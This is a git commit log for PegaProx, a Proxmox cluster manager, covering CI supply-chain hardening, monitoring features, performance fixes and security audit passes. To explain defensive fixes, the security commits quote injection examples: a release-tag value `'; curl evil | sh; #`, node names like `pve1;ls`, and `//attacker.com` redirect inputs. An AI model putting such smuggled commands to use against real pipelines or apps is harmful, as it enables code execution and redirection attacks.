buffer + `/api/metrics` exporter, so the log line is redundant at INFO.
WARNING/ERROR paths (HA, offline, drift) are untouched. Operators who
want the per-tick line back can flip PEGAPROX_LOG_LEVEL=DEBUG.

Ported from PR #510 (targeting main) onto Testing — line had moved from
1413 to 1433 since davinkevin's branch was cut, so a straight merge
wasn't clean.

Co-authored-by: Davin Kevin <davin.kevin@gmail.com>

* security: SHA512-verify Debian cloud image in release-images.yml (mirror of b6c7f9e on main)

Same supply-chain fix that just landed on main (b6c7f9e) applied here too,
so the next Testing → main merge doesn't bring the unverified wget back
and the workflow on both branches stays in sync.

Identical logic — only the resize size differs: Testing carries
`qemu-img resize pegaprox.qcow2 8G`, main carries `20G`. That divergence
predates this change.

* security: pin all 3rd-party actions + template-injection fix (CodeAnt #511 + #512)

Two CodeAnt findings on Testing, ported together because they touch the
same workflows and "pin one action while the other six float on a moving
tag" looked worse than no pinning at all.

#511 — release-images.yml `prepare/ver` step interpolated
${{ github.event.release.tag_name }} and ${{ inputs.tag }} directly into
the `run:` shell script. The interpolation happens before the shell sees
the value, so a tag like  `'; curl evil | sh; #`  would escape into the
script. Only repo-write users can push tags or dispatch the workflow, so
external exploitability is zero, but the pattern is a textbook CI escape.
Switched to `env:` block + `"$RELEASE_TAG_NAME"` shell-var reads.

#512 — Aikido's PR pinned only `actions/upload-artifact@v4` and left the
six other 3rd-party refs (`actions/checkout`, the five `docker/*-action`s,
`actions/download-artifact`, `softprops/action-gh-release`,
`actions/github-script` in issue-validator) on moving major-tags. Pinning
one but not the others is the worst of both worlds — release-build is
still vulnerable to a re-tag of any of the unpinned six. Pinned every
3rd-party action across all three workflows to the latest commit SHA in
the currently-used major version. Tag is in the trailing comment so
dependabot / renovate can bump these via PR without humans hunting SHAs.

SHAs resolved from `gh api repos/<owner>/<repo>/git/refs/tags/<tag>` at
2026-05-30 21:10 UTC; majors held at v4/v3/v5/v7/v2 to avoid sneaking a
breaking upgrade into a security commit.

  actions/checkout              v4 → v4.3.1   34e114876b0b11c390a56381ad16ebd13914f8d5
  actions/upload-artifact       v4 → v4.6.2   ea165f8d65b6e75b540449e92b4886f43607fa02
  actions/download-artifact     v4 → v4.3.0   d3f86a106a0bac45b974a628896c90dbdf5c8093
  actions/github-script         v7 → v7.1.0   f28e40c7f34bde8b3046d885e986cb6290c5673b
  docker/setup-qemu-action      v3 → v3.7.0   c7c53464625b32c7a7e944ae62b3e17d2b600130
  docker/setup-buildx-action    v3 → v3.12.0  8d2750c68a42422c14e847fe6c8ac0403b4cbd6f
  docker/login-action           v3 → v3.7.0   c94ce9fb468520275223c153574b00df6fe4bcc9
  docker/metadata-action        v5 → v5.10.0  c299e40c65443455700f0fdfc63efafe5b349051
  docker/build-push-action      v5 → v5.4.0   ca052bb54ab0790a636c9b5f226502c73d547a25
  softprops/action-gh-release   v2 → v2.6.2   3bb12739c298aeb8a4eeaf626c5b8d85266b0e65

* release: bump to v0.9.12.0 (build 2026.05.30) — Testing only, no tag yet

All five surfaces aligned per the version-bumping checklist:
  pegaprox/constants.py    PEGAPROX_VERSION = "Beta 0.9.12.0"  / PEGAPROX_BUILD = "2026.05.30"
  web/src/constants.js     PEGAPROX_VERSION = "Beta 0.9.12.0"
  version.json             version=0.9.12.0  build=2026.05.30  release_date=2026-05-30
  README.md                version badge → 0.9.12.0-beta
  web/index.html           rebuilt — PEGAPROX_VERSION="Beta 0.9.12.0"

version.json changelog gets a new top entry summarising the v0.9.12.0
train (vacation R3 wrap-up): #509 davinkevin SQLCipher mlock heuristic,
#510 davinkevin per-node-status info→debug, gyptazy PRs #429 (ACME
DNS-01) + #508 (PVE subscription management with key-mask), #413
blackshocks SR layer 5, the CodeAnt batch (API-token role-refresh, WS
cluster scope, SSH-WS SSRF, vmware path-traversal, OIDC discovery
pre-validation, subscription-key mask, useEffect clusterId dep), the
Aikido May-30 batch (3rd-party action SHA pinning, template-injection,
Debian cloud-image SHA512 verify), plain-JSON config fallback removal,
CPU dropdown sort, worldmap wheel passive-listener fix, first-run setup
wizard, alert-email html-escape, audit-log CRLF strip, ACME directory
SSRF guard, version.json worldmap-files manifest gap.

No tag, no GitHub release cut — that decision is yours. Testing-only
push so the build line on dev installs flips to 0.9.12.0 today; the
mirror upload + docs.pegaprox.com pass still pending until you give the
release-cut OK.

* sr: create_api_token retries past stale 'Token already exists'

#413 layer 6 (blackshocks 20260530_220647 bundle): Planned Failover
fails on cl2 with PVE "Parameter verification failed" / "Token already
exists" — the same 'pegaprox-sr' token from a prior failover attempt
was still on the target user, so the create POST was 400 before any
qmigrate could run. Failback hits the same wall in the opposite
direction. create_api_token now detects the 'already exists' response,
DELETEs the stale token, and retries the create exactly once. The
existing _delayed_cleanup grace path stays — this just makes the
front of the call idempotent.

- MK

* monitoring: SMART data viewer modal (replaces alert(JSON))

Node detail → Disks tab → SMART button used to alert(JSON.stringify())
the raw payload, which was useless for actually triaging a sketchy disk.

New SmartModal component renders parsed PVE smartctl output:
- Health badge (PASSED / FAILED / N/A with colour)
- NVMe detail block (temp, wear-%, power-on h, power cycles,
  unsafe shutdowns, media errors - latter red on >0)
- SATA/SAS key-attributes table (Reallocated_Sector_Ct,
  Pending, Temperature, Power_On_Hours, Wear, Uncorrect) -
  raw count >0 on the pending/reallocated rows lights red
- "All attributes" collapsed below + raw JSON dump at the very
  bottom for SMART nerds

Modal is keyed on the disk row's row-action so existing list/
button wiring stays. Closes on ESC via outer-div click.

- LW

* monitoring: per-NIC traffic + error/drop counters

Node → Network tab now carries a second table under the existing
bridge/bond config list: Interface Statistics, one row per NIC
from /proc/net/dev (SSH, /api/clusters/<id>/nodes/<n>/netstats).

Columns: RX bytes / packets / errs / drop, TX bytes / packets /
errs / drop / collisions. Non-zero err/drop/coll cells render in
red so a flapping uplink jumps out.

PVE's REST surface has aggregate /rrddata netin/netout but never
per-NIC errors — this is the one stat operators always end up
SSHing for when chasing dropped packets, so we may as well do it
once and surface it cleanly. Falls back to a silent hide on the
loopback iface (lo never has interesting numbers anyway).

- MK

* monitoring: top-N noisy neighbors on Insights tab

New /api/clusters/<id>/insights/top-talkers endpoint sorts the
cluster's VMs by a chosen metric (cpu | memory | disk_usage |
disk_io | net_io) and returns the top N. Pure aggregator over
/cluster/resources, no history table needed.

CPU / Memory / Disk usage are PVE's instantaneous percentages
(cpu_percent etc.). Disk I/O and Net I/O sort by cumulative
diskread+diskwrite / netin+netout since VM boot — that's the
"which VMs have moved the most data" proxy for noisy-neighbour
triage. For instantaneous rates we'd need RRD deltas; not the
ask here.

Frontend: new Top Talkers card on the Insights tab between
Capacity Forecast and Right-sizing, with metric selector and
the picked column highlighted. Defaults to CPU on tab open.

- MK (backend)
- LW (UI)

* i18n: monitoring expansion strings across DE/EN/FR/ES/PT/KO/IT

84 strings (12 new keys × 7 langs) for the Top Talkers card,
Interface Statistics table and SMART modal that landed in
629c19c / 384e8ed / 75f6e58. The `|| 'English fallback'` in
the JSX still works for any key we missed, but having the real
translations means DE/FR/ES/PT/KO/IT actually shows in those
locales instead of the English fallback.

New keys: topTalkers, topTalkersHint, cpuPercent, memoryPercent,
diskUsagePercent, diskIo, netIo, runningVms, interfaceStatistics,
errOrDropHint, keyAttributes, allAttributes.

- LW

* monitoring: SMART modal accepts 'OK' health (not only 'PASSED')

E2E test on a QEMU virtual disk showed health='OK' (from PVE's
SCSI/QEMU wrapper) which my colour-bucket logic put into the
yellow "unknown" tier. SATA disks usually return 'PASSED', SCSI
sometimes 'OK', actual failure is 'FAILED'. Case-insensitive now,
both PASSED and OK go green.

- LW

* monitoring: enrich /guest-info with NICs / FS / users / clock-skew

Existing /guest-info kept the same hostname/os/kernel/ip_addresses
fields (so the legacy summary table renders unchanged), and adds:

  - kernel_version: full uname-style string (was only kernel-release)
  - interfaces[]:   per-NIC {name, mac, ips:[{address,family,prefix}]}
  - filesystems[]:  real used/total per mountpoint with used_pct,
                    mirrored from /guest-fsinfo so the detail panel
                    does one round-trip instead of two
  - users[]:        QGA get-users — logged-in sessions for security
                    context ("who's on this VM right now")
  - guest_time_ns:  guest clock in ns since epoch — ntp sanity check

Short-circuits on 500 + "not running" after the first call so an
agent-less VM doesn't burn 6 round-trips. Each block in its own
try/except so a single QGA quirk doesn't kill the whole payload.

Frontend: VM detail panel's Guest Agent section adds a <details>
expander below the existing summary table with three sub-blocks
(Filesystems / Interfaces / Users) plus a clock-skew line. Green /
yellow / red on FS fill > 75% / 90%, and on clock drift > 5s / 60s.

i18n: 35 new strings across DE/EN/FR/ES/PT/KO/IT for guestDetail,
loggedInUsers, clockSkew, filesystems, interfaces. The "users" key
already existed everywhere — left alone.

- MK (backend)
- LW (UI)

* monitoring: cluster-health panel (corosync rings + pvecm + services)

New /api/clusters/<id>/nodes/<n>/cluster-health endpoint SSHes the
node and runs:
  - corosync-cfgtool -s     → ring ID, address, status, node count
  - pvecm status            → quorate, votes, cluster name, config version
  - systemctl show <svc>    → ActiveState/SubState/since/Result for
                              pveproxy, pvedaemon, pve-cluster,
                              corosync, pvestatd

Each block in its own try/except so a single command failure doesn't
nuke the whole payload — operators chasing a half-broken cluster get
partial data instead of nothing. Errors surface via the standard
{error:...} shape we use for the other SSH-backed endpoints.

Frontend: Node detail → System tab now leads with a Cluster Health
panel:
  - quorum status (green if "Yes", red otherwise)
  - per-ring table with status colour
  - 5-card service grid with active/sub state + since timestamp
    coloured by ActiveState (green=active, yellow=in-between,
    red=failed)

i18n: 28 new strings across DE/EN/FR/ES/PT/KO/IT for clusterHealth,
quorum, corosyncRings, address, services, since etc. Several keys
(nodes, votes, clusterName, since) already existed and were left.

- MK (backend)
- LW (UI)

* monitoring: lm-sensors panel (temp / fan / volt)

New /api/clusters/<id>/nodes/<n>/sensors endpoint SSHes the node and
parses `sensors -j`. Flattens the lm-sensors JSON
({chip: {sensor: {tempN_input: ...}}}) into a list of
{chip, label, kind, value, max, crit, alarm} rows.

Frontend: Sensors card at the top of System tab, table with chip /
sensor / value / max / crit / alarm columns. Coloring:
  - value >= crit OR alarm flag  → red
  - value >= max                  → yellow
  - otherwise                     → default
Hidden on hosts without lm-sensors (returns error string the UI
skips rendering for).

i18n: 21 new strings across DE/EN/FR/ES/PT/KO/IT for sensors,
sensor, sensorsHint. The "value" key already existed and was left.

- MK (backend)
- LW (UI)

* monitoring: per-tag / per-pool rollups on Insights tab

New /api/clusters/<id>/insights/rollups?group_by=tag|pool endpoint
aggregates the cluster's VMs by tag or by Proxmox pool. Returns one
row per group with vm_count, running_count, summed cpu_percent,
mem_used/max + pct, disk_used/max + pct, cumulative disk + net I/O
bytes.

VMs with multiple tags count in EVERY tag's rollup — that's the
useful semantic (the 'prod' tag should include VMs also tagged
'critical'). VMs with no tag fall into '(untagged)'. Pool grouping
gives VMs without a pool the '(no pool)' bucket.

Frontend: Insights tab gets a Rollups card between Top Talkers and
Right-sizing, with By-Tag/By-Pool selector. Table shows group key,
VM count + running count, Σ CPU%, RAM%/Disk% (with absolute
bytes on hover via title attr), cumulative net I/O.

i18n: 49 new strings (~7 keys × 7 langs) for rollups, byTag, byPool,
noGroupings, rollupsHint. The "tag", "pool", "tags", "running" keys
already existed across langs and were left untouched.

- MK (backend)
- LW (UI)

* monitoring: include Top Talkers + Rollups in Insights PDF export

The two cards (75f6e58 Top Talkers, 953d38d Rollups) showed up on
the Insights tab but the "Export PDF" button still only printed
Capacity Forecast + Right-sizing. Now exports four sections:

  1. Capacity Forecast (linear-reg ETA per metric)   - existing
  2. Top Talkers — uses the metric the user has open  - NEW
                   in the dropdown when they hit Export
  3. Rollups     — uses By-Tag / By-Pool depending    - NEW
                   on the user's current group_by toggle
  4. Right-sizing recommendations                     - existing

Subtitle now reads "Capacity Forecast · Top Talkers · Rollups ·
Right-sizing" so the printed report's header reflects all four.
Empty sections are skipped (e.g. no rollups data → block isn't
added).

Same WinAnsi-safe sanitizer the existing blocks use; bytes are
formatted via a local fmtBytesPdf so the PDF columns stay
narrow.

- MK (PDF block builders)
- LW (column shape + i18n keys reuse)

* security: defense-in-depth on monitoring endpoints (node-name + rollups cap)

Two findings from a focused audit of this week's monitoring expansion.
Neither has a known live exploit — both are defense-in-depth.

(1) Node-name validation on /netstats, /cluster-health, /sensors
    These three new SSH-fronted endpoints take `node` from the URL
    and pass it into _get_node_ip(node), which interpolates into a
    PVE API URL. The SSH command strings themselves are static so
    shell-injection is already closed, but a crafted node like
    `pve1;ls` or `pve1$(...)` would still flow into the PVE URL
    construction and into log lines. Same vector vms.py:2718
    closed back in April with a strict RFC-1035-ish regex. New
    helper _reject_bad_node() applies the identical pattern at
    each route entry.

(2) Rollups response capped at 500 groups
    /insights/rollups returned one row per distinct tag (or pool)
    with no upper bound. A fleet with thousands of distinct tags
    (admin-driven or via a clumsy bulk-tag script) could return an
    unbounded payload. Added ?limit=N with clamp [1, 500] default
    100, sorted by vm_count desc so the densest groups are kept.
    Response now also carries `truncated: bool` so the UI can
    show "showing X of Y" once we wire it.

Verified live against localhost:5000:
  /nodes/pve1;ls/sensors        → 400 Invalid node name
  /nodes/1pve/cluster-health    → 400 Invalid node name (digit-led)
  /nodes/pve1/netstats          → 502 graceful (SSH key missing in dev)
  /insights/rollups?limit=1000  → clamped to limit=500

- MK

* perf: gevent-pool truthy bugfix + parallelise cluster-health + workers cap

(A) — CRITICAL existing bug in run_concurrent
gevent.pool.Pool overrides __bool__ to len(), so an empty pool is
falsy. The check `if GEVENT_POOL and GEVENT_AVAILABLE` in the
parallelisation helper was always-False on entry — every call
silently fell through to the sequential branch since day one.
The "5x faster dashboard" comment over the helper was aspiration,
not reality. Fix: `is not None`. Both copies (utils/concurrent.py
+ the duplicate at core/manager.py:74) get the same fix.

Isolated smoke against the helper:
  before: 7 × gevent.sleep(0.5) → 3.5s wall (sequential)
  after:  7 × gevent.sleep(0.5) → 0.5s wall (parallel) ✓

NOTE — there are 4 callsites in manager.py (1289, 1701, 11081,
15051) wrapping run_concurrent in their own
`if GEVENT_AVAILABLE and GEVENT_POOL:` check with the same bug.
Those have been sequential by accident; left as-is for now
since flipping them parallel could surface latent races in the
called code. Tracked for a focused follow-up.

(B) — F5: parallelise get_node_cluster_health 7 SSH calls
corosync-cfgtool + pvecm + 5x systemctl ran sequentially at 8s
per timeout = up to 56s blocking one gevent worker. Now spawned
via run_concurrent_dict with 12s overall cap.

Parser bugfix while in there: corosync-cfgtool uses `key = value`
not `key: value`, so the status field was being stored as
"status = active" verbatim. `addr =` was already handled with the
right split; extended the same pattern to status.

(C) — F3: PEGAPROX_WORKERS default cap 8 -> 16
With (A) making fanouts actually parallel, the bottleneck shifts
to worker count when /health + /vms-backup-status + dashboard
refresh fire concurrently. 16 raises the ceiling; PEGAPROX_WORKERS
env var still wins.

- MK

* perf: parallelise /health + /vms-backup-status fanouts (F1)

Both endpoints were sequential per-node fanouts that pinned a
gevent worker for 10+ seconds per call. They're dashboard-polled
every 10-20s, so they were the main reason a 4-worker default
chewed up the pool and starved SSE during peak load.

F1a — /health storage scan
  for node in ns.keys(): mgr.get_storage_list(node)
  → run_concurrent_dict({node: lambda: mgr.get_storage_list(node)})
  Only ONLINE nodes scanned (n.status in {online, running}) — dead
  nodes would otherwise park joinall at the full timeout; sequential
  code happened to mask this because per-call connect-fail was fast,
  parallel waits the slowest. Net would have been WORSE without
  this filter on degraded clusters.

F1b — /vms-backup-status PBS + PVE scan
  Both nested loops were sequential. Refactored into:
    1) per-PBS task = scan one PBS server's datastores + snapshots
       → list of (vmid, ts, encrypted, verified_ts) tuples
    2) per-node task = scan one PVE node's backup-content
       → same tuple shape
    3) run_concurrent_dict over all tasks (timeout 8s)
    4) sequentially _bump from results into by_vm
  Separating I/O (parallel) from state mutation (sequential)
  avoids needing a lock around the shared by_vm dict.
  Also filters to ONLINE nodes only.

E2E live timing on dev (one connected cluster, one dead corosync
member dragging /nodes calls):

  /vms-backup-status: 10.4s → 0.45s  (22× faster) ✓
  /health:            10.5s → 16s    (mixed — F1a portion works,
                                       remaining 16s is upstream
                                       get_node_status() blocking
                                       2× 10s on the dead member.
                                       That's pre-existing
                                       _get_node_ip behaviour, not
                                       introduced by this commit.
                                       Healthy clusters will see
                                       the full storage-fanout win.)

Both endpoints' response shapes verified unchanged.

- MK

* perf: fix last inline GEVENT_POOL truthy-check (manager.py:1294)

Paired with the run_concurrent helper bugfix in 8af4a2d. Of the
4 callsites that wrap fanouts in their own
`if GEVENT_AVAILABLE and GEVENT_POOL:` check, only this one
(get_cluster_status_summary's per-node fetch_node_details fanout)
had the inline check too — the other 3 (1701, 11081, 15051)
call run_concurrent directly, so the helper fix already wired
them up parallel.

Fanout callbacks here are pure PVE-API reads returning tuples;
shared-state writes happen sequentially after joinall under the
ip-cache lock. Race-safe by design — confirmed by code review
of all 4 sites before flipping.

E2E live timing on the dev env:
  /health  16s → 8s     — get_node_status fanout now parallel
  /vms-backup-status    — stayed at ~450ms (F1b already had it)

Plus a comprehensive 32-check E2E self-test ran clean:
  auth + cluster basics + 7 pre-existing endpoints (regression)
  + all 5 top-talkers metrics + both rollups grouping + limit
  clamp + security gates (400 on bad node-name) + 3 monitoring
  endpoints + 4 shape-preservation checks. 32 passed, 0 failed.

- MK

* security: defense-in-depth on today's perf commits

Re-audit of 8af4a2d / 9d2f925 / 5b51da2 / a79d2eb. No live exploit
found but two belt-and-suspenders hardenings worth landing:

(D1) get_node_cluster_health — shlex.quote the svc name before
   interpolating into the systemctl shell command sent over SSH.
   SERVICES is a hardcoded allow-list today so injection isn't
   reachable now, but if the list ever moves into config/runtime
   the un-quoted f-string would be RCE on the PVE node. Quote
   makes the call site future-proof regardless of where the
   value comes from.

(D2) PVE-returned node + storage names get the RFC-1035-ish regex
   check at the boundary before flowing into URL paths. PVE itself
   controls these but if PVE were ever compromised, a crafted name
   like `../foo` would let it pivot into other PVE namespaces.
   Mirrors api/nodes.py:_NODE_NAME_RE that we already apply on
   user-supplied node names. Applied at three sites:
     - clusters.py /health storage fanout (F1a)
     - pbs.py /vms-backup-status _scan_node (F1b)
     - pbs.py _scan_node store_name (F1b inner loop)

Verified live against localhost:5000 (one connected cluster, one
dead corosync member). 18-check sweep ran clean: cluster-health
still returns the same 5 services with identical names after
shlex.quote(); /health still scores the same 2 healthy factors
(nodes + storage) after the regex filter — no over-restriction.
All top-talkers metrics, both rollups groupings, and 5 pre-existing
endpoints still respond 200.

- MK

* perf: workers = max(8, cpu_count*4) + actually plumb the pool

Two fixes in one — PEGAPROX_WORKERS was a startup-log lie before:

(A) Lie label exposed
   `_start_gevent_server` printed
     "Starting PegaProx with Gevent WSGIServer (N greenlets)"
   but the `workers` value was NEVER passed to WSGIServer's
   `spawn=` parameter. gevent.pywsgi defaults to unlimited
   greenlets when spawn is unset — so the previous `min(cpu*2, 8)`
   / `min(cpu*2, 16)` defaults capped nothing in practice. F3
   from 8af4a2d only changed the log message.
   Fixed: server_kwargs['spawn'] = Pool(workers). Per-request
   handler greenlets are now actually capped; per-request
   fanouts (storage scan, PBS scan, SSH calls) still spawn
   inside their own request handler as before.

(B) Auto-scale formula
   Old:  min(cpu_count*2, 16)   — capped huge customer boxes at 16
   New:  max(8, cpu_count*4)    — proper CPU-driven scaling
       1c VM:    8 workers   (floor for tiny VMs)
       4c:      16 workers   (= old default on this size)
       8c:      32 workers
       12c:     48 workers   (verified live on this dev box)
       32c:    128 workers
       64c:    256 workers
   gevent greenlets are KB-stack-cheap so 100s per host are fine.
   PEGAPROX_WORKERS env override still wins.

Verified live on a 12-core dev box:
  Startup log: "12 CPU cores detected ... 48 greenlets"  ✓
  20 parallel curl -> /tasks completed in 48ms wall      ✓
  /auth/check + /health still respond 200                ✓

- MK

* security: defense-in-depth audit pass 3 — three findings closed

Whole-codebase sweep beyond the perf-commit follow-up. Three real
issues surfaced.

(1) MIGRATE-SQL — v0.9.10.1 half-applied hotfix
  v0.9.10.1 added _safe_quote_ident() and applied it to
  _row_counts_encrypted (line 280). _row_counts_plain at line 262
  was missed — same f-string-table-name-into-SELECT pattern. Now
  routed through the same whitelist+quote helper. Threat model is
  restore-from-untrusted-backup; exploitability nil in normal use,
  defense-in-depth no-go regardless.

(2) OPEN-REDIRECT — OIDC redirect_after
  `request.args.get('redirect_after').startswith('/')` accepted
  `//attacker.com` (protocol-relative URL) which the browser
  resolves as offsite. Same bug in the frontend client at
  web/src/auth.js. New _safe_internal_path() requires single
  leading /, rejects // and /\\, rejects CR/LF/TAB/backslash,
  caps length at 200. Mirrored client-side. Net: redirect_after
  is now strictly an internal SPA route.

(3) MASS-ASSIGNMENT — PBS notification create/update
  create_notification_target / update_notification_target /
  create_notification_matcher / update_notification_matcher all
  pumped `**kwargs` straight into PBS API body. An admin with
  notification-manage perm could inject arbitrary field names
  PBS might silently store in /etc/proxmox-backup/notifications.cfg.
  New _sanitize_pbs_kwargs whitelist filters by:
    - key matches ^[a-z][a-z0-9-]{0,30}$ (PBS/PVE convention)
    - value is str/int/bool or None
    - lists of scalars allowed (PBS array-as-CSV pattern)
  Forward-compatible with new PBS fields. The traffic_control
  CRUD methods below already had explicit per-field whitelisting;
  this brings notifications inline.

E2E verified via unit-smoke against both helpers:
  _sanitize_pbs_kwargs: 8 assertions (legitimate / control-char /
    uppercase / dict-value / dunder-prefix / over-30-char / list-
    scalars / list-with-object). ALL pass.
  _safe_internal_path: 6 assertions (valid / //attacker /
    /\\evil / CRLF / non-string / too-long). ALL pass.

What was confirmed clean (no fix needed): session cookies have
Secure+HttpOnly+SameSite; key files chmod 0600 on write; OIDC URL
goes through sanitize_outbound_url; audit-search has limit/offset
clamps; no plaintext secrets in logging calls. Documented in the
log so the next audit pass doesn't re-investigate these.

Outstanding (parked, not addressed in this commit):
  - ~24 sites returning raw `str(e)` to client — should go through
    safe_error(). Big refactor, separate pass.
  - OIDC verify_iss=False — documented behaviour, audience claim
    check still active; recommend in-code comment clarifying the
    accept-all-issuer policy.

- MK

* security: route all client error responses through safe_error()

The defense-in-depth audit (5929e01) parked 24 sites returning raw
str(e) to the client as a known info-leak surface. This commit
closes that pass — 25 sites total across 11 files, including the
ceph.py rbd-SSH tuple-return path I missed in the original audit
count.

Pattern was:
    return jsonify({'error': str(e)}), 500
which leaks stack-trace fragments, internal paths, library
internals (paramiko exceptions, sqlite errors, PVE error bodies)
straight back to whoever hit the endpoint. safe_error() in
api/helpers.py logs the full exception via logging.error(exc_info)
and returns a generic message to the client. Operators still get
the trace in pegaprox.log.

Per-file count + import added where missing:

  pbs.py        5 sites   (existing safe_error refs)
  push.py       5 sites   + import added
  vms.py        5 sites   (incl. 2 f-string variants:
                          "SSH error: {str(e)}" and
                          "Connection failed: {str(e)}" —
                          rerouted with default_msg arg)
  users.py      3 sites   (user-folder CRUD)
  ceph.py       1 site    (rbd-SSH tuple-return at line 147)
  alerts.py     2 sites   (one was missed by an earlier scan)
  insights.py   1 site    + import expanded
  plugins.py    1 site    + import added
  clusters.py   1 site
  settings.py   1 site    (status-page plugin proxy)
  storage.py    1 site    (storage identity passthrough)

Total: 25 sites cleaned, 0 raw str(e) returns left in pegaprox/api/
or pegaprox/background/ (verified by re-running the audit grep).

E2E sweep on the running dev server: 12/12 endpoints across the
11 touched files responded 200 OK after refactor. No regression
in response shape — only the exception-message field is
generalised.

Outstanding: OIDC verify_iss=False still wants a code-comment
clarifying the accept-all-issuer policy. Pure documentation,
separate commit.

- MK

* sse: stability — json default=str + reconnect-log backoff

Two thin failure modes I spotted while auditing the SSE plumbing
for "why does it sometimes die" — both small, both real, both
target observability/durability rather than throughput.

(1) broadcast_sse json.dumps without default=
   A caller passing a datetime / set / bytes / custom-object in
   `data` would raise TypeError inside json.dumps, get swallowed
   by the outer try/except, and the broadcast would silently
   disappear — no log, no signal to operators. That's exactly the
   shape of the #413 layer 1 bug (wrong arg shape killed the
   publisher) just with a different trigger. Now:
     - json.dumps gets default=str so common Python objects coerce
     - inner try/except logs the update_type + cluster_id + error
       so the next time a caller breaks, ops can find it fast
   Smoke-tested with datetime/set/bytes (survived) and a custom
   __str__-raises object (logged + dropped, broadcaster healthy).

(2) reconnect-log INFO spam
   A dead cluster generated an INFO entry every 10s
   ("is disconnected, attempting reconnect...") → ~360 INFO
   entries per hour per dead cluster. Operators watching the
   log for actual events got drowned out. Now backoff: INFO on
   attempt #1 + every 50th (~8min cadence) for ongoing
   visibility; DEBUG in between. Reconnect cadence itself is
   unchanged at 10s. Successful-reconnect line stays INFO with
   "after N attempts" so it's clear how long the outage was.
   `_reconnect_attempt_count` resets to 0 on reconnect success.

Not addressed (deliberately scoped out):
  - _vmw_watched memory: false alarm, self-trims at 2min idle
  - Per-client put_nowait drop visibility: nice-to-have, not on
    today's path
  - Per-cluster threading.Thread spawn per loop: gevent monkey-
    patches to a greenlet so it's cheap; not a real bottleneck

E2E verified: server restarted clean, SSE stream opened via
/api/sse/token then /api/sse/updates?token=<t>, received
'connected' + live 'tasks' events for both connected clusters.
No regression to broadcaster cadence.

- MK

* sse: shrink dark-window after cluster reconnect (target <30s SLA)

Two-part tightening of the recover-to-UI-visible window so a
cluster (or single node) coming back online surfaces in the
dashboard within a worst-case ~30s instead of drifting toward
60s+.

(1) On successful connect_to_proxmox(), push a fresh metrics
    broadcast immediately + clear any pending _sse_cooldown_until.
    Previously the reconnected cluster waited up to one full
    broadcast-loop tick (1s) plus any pre-existing cooldown
    before the UI flipped to "online" — even though the
    connection was already back. Now: reconnect → metrics
    pushed in the same iteration.

(2) Error-cooldown 15s → 10s on get_tasks / get_node_status
    failure paths. Cooldown gates broadcasts while a host is
    flaky, so a 15s cooldown means up to 15s of dark UI per
    cycle. On a marginally-recovering cluster that hits two
    cooldown cycles in a row, dark-window stretches to 30s.
    With 10s the worst-case two-cycle stretch is 20s, leaving
    comfortable headroom under a 30s SLA.

Combined with the existing 10s reconnect-retry cadence + 1s
broadcast loop, the recovery story is now:
  - healthy cluster, single node bounces: UI sees green within
    1-2s (per-loop get_node_status broadcast)
  - cluster TCP-unreachable, returns within seconds: UI sees
    green within 10-20s (reconnect retry + fresh-metrics push)
  - cluster slow-recovering (multiple cooldown cycles before
    stable): worst case ~30s

Per-cluster fan-out via threading.Thread (gevent-patched to
greenlet) still has the 8s join-timeout, so one slow cluster
can't drag the others.

E2E note: dev cluster came back clean after restart; SSE
stream open, heartbeat + tasks events flowing. No regression
to the broadcaster cadence or shape.

- MK

* docs: clarify why OIDC verify_iss is intentionally False

Last finding from the defense-in-depth audit pass (5929e01 noted
this as a follow-up). Pure documentation — no logic change.

`verify_iss=False` in the pyjwt.decode call has been flagged by
multiple SAST scanners as a missing claim check. It is intentional:

  - Real-world IdPs return inconsistent `iss` values relative to
    the operator-configured authority URL (trailing slash, host
    vs FQDN, http vs https on internal IdPs).
  - Signature verification ALREADY binds the token to the
    configured authority — `signing_key` is fetched from the
    JWKS endpoint at that authority, so a token signed elsewhere
    fails before any claim is read.
  - `verify_aud=True` + `audience=accepted` keeps audience-claim
    binding.
  - Nonce check on the next line covers replay.

The next person reading this code (or running SAST) shouldn't
have to re-derive the same conclusion or accidentally flip it
to True and break Authentik/Keycloak/Entra logins.

- MK

* release: bump build date 2026.05.30 → 2026.05.31

The version-bump landed yesterday but 23 commits worth of monitoring
expansion + perf hardening + defense-in-depth + safe_error refactor
+ SSE-stability + OIDC doc went on top today. Update build date so
the snapshot accurately reflects "this is the May 31 release-prep".

Version itself (0.9.12.0) unchanged.

- MK

* fix(cluster-health): hide 5 empty '?' service cards when SSH unavailable

Nico's eyeball test on Testing today: Cluster Health panel rendered
the 5 PVE services (pveproxy / pvedaemon / pve-cluster / corosync /
pvestatd) each with "?" as ActiveState because the dev-env's
PegaProx user has no SSH key to the PVE nodes. Visual noise that
looked like a half-broken integration.

Backend (core/manager.py get_node_cluster_health):
  After running the 7 SSH calls via run_concurrent_dict, set
  ssh_unavailable=True if EVERY block came back empty:
    corosync is None AND pvecm is None AND every service.active is None.
  The 5-row services array stays for shape compatibility — UI
  decides what to do with it.

Frontend (node_modals.js):
  If ssh_unavailable: render a single italic explainer:
    "Cluster Health needs SSH access to the node from PegaProx
     (corosync-cfgtool, pvecm, systemctl). Configure the cluster's
     Node-Shell SSH credentials and refresh."
  Otherwise: render the data we have. The services grid now also
  filters out rows where active is null (defensive — won't show
  '?' cards even on partial SSH success).

i18n: clusterHealthSshMissing in DE/EN/FR/ES/PT/KO/IT (7 strings).

E2E verified on dev (no SSH key): /cluster-health now returns
ssh_unavailable=true. UI explainer visible instead of '?' cards.
In customer installs with Node-Shell credentials configured this
flag stays false and the original data layout renders unchanged.

- MK

---------

Co-authored-by: mkellermann97 <marcus.kellermann@pegaprox.com>
Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com>
Co-authored-by: Florian Paul Azim Hoberg <florian.hoberg@credativ.de>
Co-authored-by: gyptazy <4150400+gyptazy@users.noreply.github.com>
Co-authored-by: Davin Kevin <davin.kevin@gmail.com>
2026-05-31 21:26:49 +02:00
MrMasterbay
f95175c84d release: v0.9.11 (Testing batch)
- Capacity Outlook card switched to /insights/forecast (linear-regression + R²-gated)
- Glance-style single-value summary; per-metric drilldown moved to Insights page
- Removed duplicate /predictive-analysis route in reports.py (clusters.py wins URL match)
- Version bump: 0.9.10.3 → 0.9.11 across constants.py / constants.js / version.json / README
- 9 new i18n keys × 7 langs (capacityCollecting, metricAtRisk, metricsAtRisk, allMetricsStable, overThreshold, etaIn, forecastEngine, stable, metric)
2026-05-24 17:12:12 +02:00
mkellermann97
143f58a22b release: v0.9.10.3 (build 2026.05.18)
Bundle the four-day-patrol fixes into a single hotfix release.
17 commits on Testing → main. See version.json changelog entry for
the full ticket-by-ticket summary. Headlines:

